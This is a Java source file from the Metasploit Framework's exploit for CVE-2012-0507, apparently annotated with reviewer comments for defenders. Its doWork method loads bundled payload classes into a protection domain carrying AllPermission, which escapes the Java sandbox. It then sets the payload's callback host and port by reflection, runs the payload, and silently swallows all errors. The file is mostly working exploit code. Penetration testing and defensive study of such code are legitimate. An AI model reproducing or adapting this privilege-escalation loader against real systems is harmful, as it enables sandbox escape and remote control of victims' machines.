GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2012-0507/msf/x/Help.java
package msf.x;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.net.URL;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.lang.reflect.Field;
/**
 * Class-definition helper from the Metasploit module source for CVE-2012-0507
 * (per the repository path of this file).
 *
 * <p>The class extends {@link ClassLoader}, which lets its own static method call
 * the protected {@code defineClass}, and it also implements {@link Serializable}.
 * How a caller comes to hold an instance is not shown in this file.
 *
 * <p>Reviewer notes for defenders: a {@code ClassLoader} subclass that is also
 * {@code Serializable}, and a {@code defineClass} call whose
 * {@link ProtectionDomain} carries {@link AllPermission}, are both unusual in
 * ordinary application code and are reasonable signals to flag when triaging an
 * untrusted JAR. Classes defined in such a domain pass every permission check,
 * so sandbox limits on the defining code do not carry over to them. The flaw
 * behind the CVE is in the Java runtime itself; the remedy is an updated runtime,
 * not a change to application code.
 *
 * <p>The declaration is kept exactly as published (no added members or modifiers).
 */
public class Help extends ClassLoader implements Serializable {

    /**
     * Defines the two bundled payload classes through {@code h} with an
     * all-permissions protection domain, copies the connection settings into the
     * last class defined, and instantiates it.
     *
     * <p>Every failure (missing resource, reflection error, linkage error wrapped
     * in an exception) is swallowed, so the method never reports why it stopped.
     *
     * @param h     loader instance whose {@code defineClass} is invoked
     * @param expl  object whose class is used to locate the bundled class files
     * @param data  value stored into the payload class's public {@code data} field
     * @param jar   value stored into the payload class's public {@code jar} field
     * @param lhost value stored into the payload class's public {@code lhost} field
     * @param lport value stored into the payload class's public {@code lport} field
     */
    public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) {
        // Parallel arrays: binary class name and the resource path of its bytes.
        // The nested class is defined first, the outer class last.
        final String[] names = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };
        final String[] resources = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };
        Class<?> lastDefined = null;

        try {
            for (int i = 0; i < names.length; i++) {
                // Pull the raw class file out of the archive that also holds expl's class.
                ByteArrayOutputStream collected = new ByteArrayOutputStream();
                byte[] chunk = new byte[8192];
                InputStream in = expl.getClass().getResourceAsStream(resources[i]);
                for (int n = in.read(chunk); n > 0; n = in.read(chunk)) {
                    collected.write(chunk, 0, n);
                }
                byte[] classBytes = collected.toByteArray();

                // The security-relevant step: an unsigned "file:///" code source
                // paired with AllPermission, so the defined class is fully trusted.
                CodeSource origin = new CodeSource(new URL("file:///"), new Certificate[0]);
                Permissions everything = new Permissions();
                everything.add(new AllPermission());
                ProtectionDomain domain = new ProtectionDomain(origin, everything);

                lastDefined = h.defineClass(names[i], classBytes, 0, classBytes.length, domain);
            }

            // After the loop this refers to msf.x.PayloadX, the last entry in names.
            if (lastDefined == null) {
                return;
            }

            // getField only resolves public fields of the freshly defined class.
            Field dataField = lastDefined.getField("data");
            Field jarField = lastDefined.getField("jar");
            Field lhostField = lastDefined.getField("lhost");
            Field lportField = lastDefined.getField("lport");

            // First instance exists only as the receiver for the reflective writes.
            // NOTE(review): presumably these fields are static, since the values must
            // outlive this instance - confirm against PayloadX.
            Object carrier = lastDefined.newInstance();
            dataField.set(carrier, data);
            jarField.set(carrier, jar);
            lhostField.set(carrier, lhost);
            lportField.setInt(carrier, lport);

            // Second instance: per the original comment, this one performs the payload.
            lastDefined.newInstance();
        } catch (Exception ignored) {
            // Deliberately silent: the original only had a commented-out println here.
        }
    }
}